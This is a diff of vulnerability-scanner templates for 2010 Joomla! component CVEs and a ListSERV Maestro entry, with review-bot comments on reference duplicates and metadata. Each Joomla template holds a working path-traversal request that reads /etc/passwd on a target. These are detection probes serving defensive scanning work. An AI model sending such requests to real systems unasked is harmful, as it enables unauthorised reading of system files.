@@ -4,24 +4,27 @@ info: name: Joomla! Component Graphics 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12430 - https://www.cvedetails.com/cve/CVE-2010-1653 + - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt + - http://www.securityfocus.com/bid/39743 + classification: + cve-id: CVE-2010-1653 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/23 diff --git a/cves/2010/CVE-2010-1657.yaml b/cves/2010/CVE-2010-1657.yaml index b3bc8509e7..4c62d5a31c 100644 --- a/cves/2010/CVE-2010-1657.yaml +++ b/cves/2010/CVE-2010-1657.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2010-1657 - https://www.exploit-db.com/exploits/12428 - - https://www.cvedetails.com/cve/CVE-2010-1657 + - http://www.vupen.com/english/advisories/2010/1006 + - http://www.securityfocus.com/bid/39740 + classification: + cve-id: CVE-2010-1657 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2010/CVE-2010-1658.yaml b/cves/2010/CVE-2010-1658.yaml index 1996fbeb69..aae12dd013 100644 --- a/cves/2010/CVE-2010-1658.yaml +++ b/cves/2010/CVE-2010-1658.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12427 - https://www.cvedetails.com/cve/CVE-2010-1658 + - http://www.vupen.com/english/advisories/2010/1007 + - http://secunia.com/advisories/39600 + classification: + cve-id: CVE-2010-1658 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/27 diff --git a/cves/2010/CVE-2010-1659.yaml b/cves/2010/CVE-2010-1659.yaml index fb4d569289..90e20630f5 100644 --- a/cves/2010/CVE-2010-1659.yaml +++ b/cves/2010/CVE-2010-1659.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12426 - - https://www.cvedetails.com/cve/CVE-2010-1659 + - https://nvd.nist.gov/vuln/detail/CVE-2010-1659 + - http://www.securityfocus.com/bid/39739 + - http://www.exploit-db.com/exploits/12426 + classification: + cve-id: CVE-2010-1659 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/cves/2010/CVE-2010-1714.yaml b/cves/2010/CVE-2010-1714.yaml index 6ff7a55726..1dacc59f33 100644 --- a/cves/2010/CVE-2010-1714.yaml +++ b/cves/2010/CVE-2010-1714.yaml 
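Review bot: The reference list now contains the same Exploit-DB entry twice, once as the kept context line `https://www.exploit-db.com/exploits/12426` and once as the newly added `http://www.exploit-db.com/exploits/12426`; drop the added plain-HTTP duplicate. The same duplicate is introduced in the CVE-2010-1719 (12233), CVE-2010-1722 (12177), CVE-2010-1952 (12239) and CVE-2010-1953 (12288) hunks.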
@@ -4,24 +4,27 @@ info: name: Joomla! Component Arcade Games 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12168 - https://www.cvedetails.com/cve/CVE-2010-1714 + - http://packetstormsecurity.org/1004-exploits/joomlaarcadegames-lfi.txt + - http://secunia.com/advisories/39413 + classification: + cve-id: CVE-2010-1714 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/28 diff --git a/cves/2010/CVE-2010-1715.yaml b/cves/2010/CVE-2010-1715.yaml index 6eabdff378..a97738faf3 100644 --- a/cves/2010/CVE-2010-1715.yaml +++ b/cves/2010/CVE-2010-1715.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information. + description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12174 - https://www.cvedetails.com/cve/CVE-2010-1715 + - http://www.osvdb.org/63659 + - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt + classification: + cve-id: CVE-2010-1715 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/cves/2010/CVE-2010-1717.yaml b/cves/2010/CVE-2010-1717.yaml index cb08bb4b40..890db1d0fa 100644 --- a/cves/2010/CVE-2010-1717.yaml +++ b/cves/2010/CVE-2010-1717.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12291 - https://www.cvedetails.com/cve/CVE-2010-1717 + - http://secunia.com/advisories/39526 + - http://www.vupen.com/english/advisories/2010/0924 + classification: + cve-id: CVE-2010-1717 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1718.yaml b/cves/2010/CVE-2010-1718.yaml index 5ebbc5844c..330a7e33cf 100644 --- a/cves/2010/CVE-2010-1718.yaml +++ b/cves/2010/CVE-2010-1718.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12282 - https://www.cvedetails.com/cve/CVE-2010-1718 + - http://secunia.com/advisories/39521 + - http://www.securityfocus.com/bid/39545 + classification: + cve-id: CVE-2010-1718 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1719.yaml b/cves/2010/CVE-2010-1719.yaml index b41a153cae..5d51b37d14 100644 --- a/cves/2010/CVE-2010-1719.yaml +++ b/cves/2010/CVE-2010-1719.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12233 - https://www.cvedetails.com/cve/CVE-2010-1719 + - http://osvdb.org/63806 + - http://www.exploit-db.com/exploits/12233 + classification: + cve-id: CVE-2010-1719 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1722.yaml b/cves/2010/CVE-2010-1722.yaml index 6290c4d973..9fb0c0d11a 100644 --- a/cves/2010/CVE-2010-1722.yaml +++ b/cves/2010/CVE-2010-1722.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Online Market 2.x - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12177 - https://www.cvedetails.com/cve/CVE-2010-1722 + - http://secunia.com/advisories/39409 + - http://www.exploit-db.com/exploits/12177 + classification: + cve-id: CVE-2010-1722 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1723.yaml b/cves/2010/CVE-2010-1723.yaml index 4b5060444b..f548d05670 100644 --- a/cves/2010/CVE-2010-1723.yaml +++ b/cves/2010/CVE-2010-1723.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12289 - https://www.cvedetails.com/cve/CVE-2010-1723 + - http://secunia.com/advisories/39524 + classification: + cve-id: CVE-2010-1723 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/01 diff --git a/cves/2010/CVE-2010-1858.yaml b/cves/2010/CVE-2010-1858.yaml index 084d817de4..6b922c1303 100644 --- a/cves/2010/CVE-2010-1858.yaml +++ b/cves/2010/CVE-2010-1858.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component SMEStorage - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + description: A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11853 - https://www.cvedetails.com/cve/CVE-2010-1858 + - http://www.securityfocus.com/bid/38911 + - http://packetstormsecurity.org/1003-exploits/joomlasmestorage-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1858 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1870.yaml b/cves/2010/CVE-2010-1870.yaml index 75e15e4977..c1f2a8656d 100644 --- a/cves/2010/CVE-2010-1870.yaml +++ b/cves/2010/CVE-2010-1870.yaml 
@@ -4,16 +4,18 @@ info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd severity: info - description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + description: A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - tags: rce,listserv,ognl,cves,cve2010 + - https://www.exploit-db.com/exploits/14360 + - http://confluence.atlassian.com/display/FISHEYE/FishEye+Security+Advisory+2010-06-16 classification: cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N - cvss-score: 5.0 + cvss-score: 5 cve-id: CVE-2010-1870 cwe-id: CWE-917 + tags: cve,cve2010,rce,listserv,ognl requests: - method: GET @@ -28,3 +30,5 @@ requests: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' + +# Enhanced by mp on 2022/03/20 diff --git a/cves/2010/CVE-2010-1873.yaml b/cves/2010/CVE-2010-1873.yaml deleted file mode 100644 index 4331b8702c..0000000000 --- a/cves/2010/CVE-2010-1873.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2010-1873 - -info: - name: Joomla! Component Jvehicles - Local File Inclusion - author: daffainfo - severity: high - description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php. - reference: - - https://www.exploit-db.com/exploits/11997 - - https://www.cvedetails.com/cve/CVE-2010-1873 - tags: cve,cve2010,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 \ No newline at end of file 
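Review bot: `cvss-score: 5.0` was rewritten to `cvss-score: 5`, which changes the parsed YAML type from float to integer for no gain; keep `cvss-score: 5.0`. With that score and an RCE in the template name, the unchanged `severity: info` context line looks wrong — a CVSS 5.0 maps to medium, so `severity: medium` would be consistent if the score is taken from the NVD record. Moving `tags` below `classification` matches the key order used by the Joomla hunks in this commit.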
diff --git a/cves/2010/CVE-2010-1875.yaml b/cves/2010/CVE-2010-1875.yaml index 4db56ab46e..a28222ddb1 100644 --- a/cves/2010/CVE-2010-1875.yaml +++ b/cves/2010/CVE-2010-1875.yaml @@ -4,24 +4,27 @@ info: name: Joomla! Component Property - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/11851 - https://www.cvedetails.com/cve/CVE-2010-1875 + - http://secunia.com/advisories/39074 + - http://www.securityfocus.com/bid/38912 + classification: + cve-id: CVE-2010-1875 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/cves/2010/CVE-2010-1878.yaml b/cves/2010/CVE-2010-1878.yaml index 551f28d4a6..9e048e4fa4 100644 --- a/cves/2010/CVE-2010-1878.yaml +++ b/cves/2010/CVE-2010-1878.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12317 - https://www.cvedetails.com/cve/CVE-2010-1878 + - http://www.securityfocus.com/bid/39606 + - http://packetstormsecurity.org/1004-exploits/joomlaorgchart-lfi.txt + classification: + cve-id: CVE-2010-1878 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/17 diff --git a/cves/2010/CVE-2010-1952.yaml b/cves/2010/CVE-2010-1952.yaml index 5e71f4a39f..33bb5efa53 100644 --- a/cves/2010/CVE-2010-1952.yaml +++ b/cves/2010/CVE-2010-1952.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component BeeHeard 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12239 - https://www.cvedetails.com/cve/CVE-2010-1952 + - http://secunia.com/advisories/39475 + - http://www.exploit-db.com/exploits/12239 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1952 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1953.yaml b/cves/2010/CVE-2010-1953.yaml index 106ad37fdc..5a2a33c919 100644 --- a/cves/2010/CVE-2010-1953.yaml +++ b/cves/2010/CVE-2010-1953.yaml 
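Review bot: The new reference `http://www.exploit-db.com/exploits/12239` duplicates the existing `https://www.exploit-db.com/exploits/12239` entry except for the scheme, so the list now carries the same advisory twice; drop the plain-http copy. The same scheme-only duplicate is introduced in the hunks for CVE-2010-1953 (12288), CVE-2010-1954 (12287), CVE-2010-1980 (12085), CVE-2010-1981 (12087), CVE-2010-1983 (12055), CVE-2010-2128 (12607), CVE-2010-2259 (10946), CVE-2010-2682 (14017) and CVE-2010-2857 (14274). Separately, this hunk appends `# Enhanced by mp on 2022/02/15` directly after `- 200` without the blank separator line that CVE-2010-1875 and CVE-2010-1953 use; CVE-2010-1954, CVE-2010-1955 and CVE-2010-1956 do the same, so the trailer layout should be made consistent one way or the other.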
@@ -4,24 +4,28 @@ info: name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12288 - https://www.cvedetails.com/cve/CVE-2010-1953 + - http://www.vupen.com/english/advisories/2010/0927 + - http://www.exploit-db.com/exploits/12288 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1953 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1954.yaml b/cves/2010/CVE-2010-1954.yaml index 15235070e6..67e4710e8c 100644 --- a/cves/2010/CVE-2010-1954.yaml +++ b/cves/2010/CVE-2010-1954.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12287 - https://www.cvedetails.com/cve/CVE-2010-1954 + - http://www.securityfocus.com/bid/39552 + - http://www.exploit-db.com/exploits/12287 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1954 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1955.yaml b/cves/2010/CVE-2010-1955.yaml index 932f7d5fe8..bdb1172ecd 100644 --- a/cves/2010/CVE-2010-1955.yaml +++ b/cves/2010/CVE-2010-1955.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12238 - https://www.cvedetails.com/cve/CVE-2010-1955 + - http://www.securityfocus.com/bid/39508 + - http://secunia.com/advisories/39473 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1955 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml index a9e931f712..15d2026732 100644 --- a/cves/2010/CVE-2010-1956.yaml +++ b/cves/2010/CVE-2010-1956.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12285 - https://www.cvedetails.com/cve/CVE-2010-1956 + - http://secunia.com/advisories/39522 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1956 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1957.yaml b/cves/2010/CVE-2010-1957.yaml index 7f16c277c4..fee775cfe3 100644 --- a/cves/2010/CVE-2010-1957.yaml +++ b/cves/2010/CVE-2010-1957.yaml 
@@ -4,10 +4,14 @@ info: name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12235 - https://www.cvedetails.com/cve/CVE-2010-1957 + - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1957 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +24,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/02/16 diff --git a/cves/2010/CVE-2010-1977.yaml b/cves/2010/CVE-2010-1977.yaml index 71de2a9492..a28a59056f 100644 --- a/cves/2010/CVE-2010-1977.yaml +++ b/cves/2010/CVE-2010-1977.yaml 
@@ -4,10 +4,15 @@ info: name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12083 - https://www.cvedetails.com/cve/CVE-2010-1977 + - http://www.securityfocus.com/bid/39243 + - http://secunia.com/advisories/39356 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1977 tags: cve,cve2010,joomla,lfi requests: @@ -20,8 +25,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/16 diff --git a/cves/2010/CVE-2010-1979.yaml b/cves/2010/CVE-2010-1979.yaml index 00cab2ad0f..3b1f768585 100644 --- a/cves/2010/CVE-2010-1979.yaml +++ b/cves/2010/CVE-2010-1979.yaml 
